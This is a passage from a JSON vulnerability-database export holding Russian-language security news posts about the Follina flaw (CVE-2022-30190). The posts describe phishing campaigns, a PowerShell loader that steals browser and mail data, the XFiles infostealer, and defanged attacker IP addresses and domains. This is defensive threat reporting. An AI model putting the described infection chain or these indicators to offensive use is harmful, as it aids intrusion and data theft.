\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Windows. \u041e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u0442 Microsoft \u0434\u043b\u044f \u043d\u0435\u0435 \u043d\u0435\u0442, \u043e\u0434\u043d\u0430\u043a\u043e \u043d\u0430 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 0patch \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u043d\u0435\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u043f\u0430\u0442\u0447.\n\n\u041a\u0430\u043a \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442 CERT-UA, \u0437\u0430 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u043c\u0438 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u043d\u0430 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435 \u0421\u041c\u0418 \u043c\u043e\u0436\u0435\u0442 \u0441\u0442\u043e\u044f\u0442\u044c APT-\u0433\u0440\u0443\u043f\u043f\u0430 Sandworm, \u0441\u0432\u044f\u0437\u044b\u0432\u0430\u0435\u043c\u0430\u044f \u0441 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e\u043c \u0420\u0424.\n\n#\u0425\u0430\u043a\u0435\u0440\u044b #Sandworm #Follina\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-06-14T15:48:06.000000Z"}, {"uuid": "01a1e421-d0c0-432f-8295-6eed3a6e4983", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/rvXi86HDIl7XGWfAbwrfkCDBY-P6DLuptUq4D-tOA8F9OF0", 
"content": "", "creation_timestamp": "2026-04-10T15:00:21.000000Z"}, {"uuid": "270b2c4d-fb8a-4cda-8edc-c4c7c138e99b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/772", "content": "\u200b\u26a1\ufe0f \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina \u0441\u0442\u0430\u043b\u0430 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0438\u043c \u043a\u0438\u0431\u0435\u0440\u043e\u0440\u0443\u0436\u0438\u0435\u043c.\n\n\ud83d\udcac \u041d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u0441\u0443\u0431\u044a\u0435\u043a\u0442 \u0443\u0433\u0440\u043e\u0437\u044b, \u0441\u043f\u043e\u043d\u0441\u0438\u0440\u0443\u0435\u043c\u044b\u0439 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u043e\u043c, \u043f\u0440\u043e\u0432\u0435\u043b \u043d\u043e\u0432\u0443\u044e \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0443 \u043d\u0430 \u0433\u043e\u0441\u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0415\u0432\u0440\u043e\u043f\u044b \u0438 \u0421\u0428\u0410. \u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Proofpoint \u0437\u0430\u044f\u0432\u0438\u043b\u0430, \u0447\u0442\u043e \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 CVE-2022-30190 c \u043e\u0446\u0435\u043d\u043a\u043e\u0439 CVSS 7,8. 
\u0426\u0435\u043b\u044f\u043c \u0431\u044b\u043b\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u0435 1000 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0445 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0443.\n\n\u00ab\u042d\u0442\u0430 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u043f\u043e\u0434 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u044b \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 RTF \u0441 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430, \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0441 45.76.53[.]253\u00bb, \u2014 \u043d\u0430\u043f\u0438\u0441\u0430\u043b\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0432 Twitter .\n\n\u041f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0432 \u0432\u0438\u0434\u0435 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0438\u043c\u0435\u0435\u0442 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0443 Base64 \u0438 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u0443\u0435\u0442 \u043a\u0430\u043a \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0441 \u0438\u043c\u0435\u043d\u0435\u043c 
\u00abseller-notification[.]live\u00bb.\n\n\u00ab\u042d\u0442\u043e\u0442 \u0441\u043a\u0440\u0438\u043f\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 , \u043a\u0440\u0430\u0434\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u0437 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432, \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0445 \u0441\u043b\u0443\u0436\u0431, \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u0430 \u0437\u0430\u0442\u0435\u043c \u0430\u0440\u0445\u0438\u0432\u0438\u0440\u0443\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 45.77.156[.]179\u00bb, \u2014 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b Proofpoint.\n\n\u0424\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u0430\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0435 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u043e\u0439, \u043d\u043e \u043e\u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u043e\u0439 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0430 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u043a\u0438 \u0430\u0442\u0430\u043a\u0438 \u0438 
\u0448\u0438\u0440\u043e\u043a\u0438\u0445 \u0440\u0430\u0437\u0432\u0435\u0434\u044b\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 PowerShell.\n\n\u00ab\u041e\u0431\u0448\u0438\u0440\u043d\u0430\u044f \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0430, \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u043d\u0430\u044f \u0432\u0442\u043e\u0440\u044b\u043c \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u043c PowerShell, \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0437\u0430\u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432\u0430\u043d \u0431\u043e\u043b\u044c\u0448\u0438\u043c \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e\u043c \u041f\u041e \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u0446\u0435\u043b\u0438. 
\u0410\u0442\u0430\u043a\u0430 \u043d\u0430 \u0435\u0432\u0440\u043e\u043f\u0435\u0439\u0441\u043a\u043e\u0435 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e \u0438 \u043c\u0435\u0441\u0442\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u044b \u0432\u043b\u0430\u0441\u0442\u0438 \u0421\u0428\u0410 \u0437\u0430\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u043d\u0430\u0441 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u0430 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u043e\u043c\u00bb, \u2014 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0430 Proofpoint.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Follina \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0441\u0445\u0435\u043c\u0443 URI \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u00abms-msdt\u00bb \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0446\u0435\u043b\u0435\u0432\u044b\u043c\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438 \u0438 \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439. 
\u041f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c Microsoft \u043f\u0440\u0438\u0437\u0432\u0430\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b , \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u0432\u0435\u043a\u0442\u043e\u0440 \u0430\u0442\u0430\u043a\u0438. \u0422\u0430\u043a\u0436\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0420\u043e\u0441\u0441\u0438\u0438, \u0411\u0435\u043b\u0430\u0440\u0443\u0441\u0438 \u0438 \u0422\u0438\u0431\u0435\u0442\u0430 .\n\n#Follina #\u041a\u0438\u0431\u0435\u0440\u043e\u0440\u0443\u0436\u0438\u0435 #\u0425\u0430\u043a\u0435\u0440\u044b\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-06-06T13:17:42.000000Z"}, {"uuid": "66eb799b-ebd0-4b41-a27c-227c2423e26c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/833", "content": "\u200b\u2694\ufe0f Microsoft \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0443\u044e 0-day Follina \u0438 \u0435\u0449\u0435 55 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.\n\n\ud83d\udcac \u0418\u0437 55 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0442\u0440\u0438 
\u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u043a\u0430\u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c RCE-\u0430\u0442\u0430\u043a\u0438. \u0412\u0441\u0435 \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u043a\u0430\u043a \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435. \u0412 \u043f\u0430\u0442\u0447 \u043d\u0435 \u0432\u043e\u0448\u043b\u0438 5 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 Microsoft Edge Chromium, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u044b \u0440\u0430\u043d\u0435\u0435 \u043d\u0430 \u044d\u0442\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435.\n\n\u041d\u0438\u0436\u0435 \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043e\u0448\u0438\u0431\u043e\u043a \u0432 \u043a\u0430\u0436\u0434\u043e\u0439 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439:\n\n\u2014 12 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439;\n\u2014 1 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0445\u043e\u0434\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438;\n\u2014 27 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439;\n\u2014 11 
\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438;\n\u2014 3 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442\u043a\u0430\u0437\u0430 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438;\n\u2014 1 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u0441\u043f\u0443\u0444\u0438\u043d\u0433.\n\n\u0425\u043e\u0447\u0435\u0442\u0441\u044f \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0435\u0439 0-day Follina. \u041c\u044b \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437 \u0441\u043e\u043e\u0431\u0449\u0430\u043b\u0438 \u043f\u0440\u043e \u0430\u0442\u0430\u043a\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u043e\u0431\u044a\u044f\u0441\u043d\u0438\u043b\u0438 \u043f\u0440\u0438\u0447\u0438\u043d\u0443 \u0435\u0435 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f.\n\nFollina \u0438\u043b\u0438 \u0436\u0435 CVE-2022-30190 \u0441\u0440\u0430\u0437\u0443 \u0436\u0435 \u043f\u0440\u0438\u0433\u043b\u044f\u043d\u0443\u043b\u0430\u0441\u044c \u0445\u0430\u043a\u0435\u0440\u0430\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u0440\u0438\u043d\u044f\u043b\u0438\u0441\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0435\u0435 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445. 
\u0421\u0430\u043c\u044b\u043c\u0438 \u0433\u0440\u043e\u043c\u043a\u0438\u043c\u0438 \u0441\u043b\u0443\u0447\u0430\u044f\u043c\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441\u0442\u0430\u043b\u0438:\n\n\u2014 \u0410\u0442\u0430\u043a\u0430 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0445\u0430\u043a\u0435\u0440\u0430 \u043d\u0430 \u0433\u043e\u0441\u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0415\u0421 \u0438 \u0421\u0428\u0410;\n\u2014 \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u041f\u041e Qbot;\n\u2014 \u0410\u0442\u0430\u043a\u0430 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 Sandworm \u043d\u0430 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435 \u0421\u041c\u0418.\n\n\u041f\u0430\u0442\u0447 \u0431\u0443\u0434\u0435\u0442 \u0432\u043a\u043b\u044e\u0447\u0435\u043d \u0432 \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f Windows \u0437\u0430 \u0438\u044e\u043d\u044c 2022 \u0433\u043e\u0434\u0430.\n\n#Microsoft #Follina #\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-06-16T05:16:47.000000Z"}, {"uuid": "01f88c79-c870-48d1-862f-8cc316e4198f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/924", "content": "\u200b\u2694\ufe0f \u0418\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440 XFiles 
\u0430\u0442\u0430\u043a\u0443\u0435\u0442 Windows \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Follina.\n\n\ud83d\udcac \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 Cyberint \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440 XFiles \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 (Follina) \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 \u0436\u0435\u0440\u0442\u0432\u044b.\n\n\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Word \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 OLE-\u043e\u0431\u044a\u0435\u043a\u0442, \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0438\u0439 \u043d\u0430 HTML-\u0444\u0430\u0439\u043b \u043d\u0430 \u0432\u043d\u0435\u0448\u043d\u0435\u043c \u0440\u0435\u0441\u0443\u0440\u0441\u0435, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c JavaScript-\u043a\u043e\u0434. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f PowerShell-\u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0434\u043b\u044f \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 Windows \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e. 
\u0414\u0430\u043b\u0435\u0435 \u043c\u043e\u0434\u0443\u043b\u044c \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u044d\u0442\u0430\u043f\u0430 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0448\u0435\u043b\u043b-\u043a\u043e\u0434. \u041e\u043d \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u043b\u044e\u0447\u043e\u043c AES-\u0434\u0435\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c \u0436\u0435 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0447\u0435\u0440\u0435\u0437 \u0432\u044b\u0437\u043e\u0432 API.\n\n\u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f XFiles \u043a\u0440\u0430\u0434\u0435\u0442 cookie-\u0444\u0430\u0439\u043b\u044b, \u043f\u0430\u0440\u043e\u043b\u0438 \u0438 \u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0432\u0435\u0431-\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430, \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0435\u0442 \u043f\u0430\u0440\u043e\u043b\u044c \u043a\u0440\u0438\u043f\u0442\u043e\u043a\u043e\u0448\u0435\u043b\u044c\u043a\u0430, \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0441\u043d\u0438\u043c\u043a\u0438 \u044d\u043a\u0440\u0430\u043d\u0430, \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u0435\u0442 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Discord \u0438 Telegram.\n\n\u0424\u0430\u0439\u043b\u044b \u0445\u0440\u0430\u043d\u044f\u0442\u0441\u044f \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e \u0432\u043e \u0432\u043d\u043e\u0432\u044c \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0445 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430\u0445 \u0438 
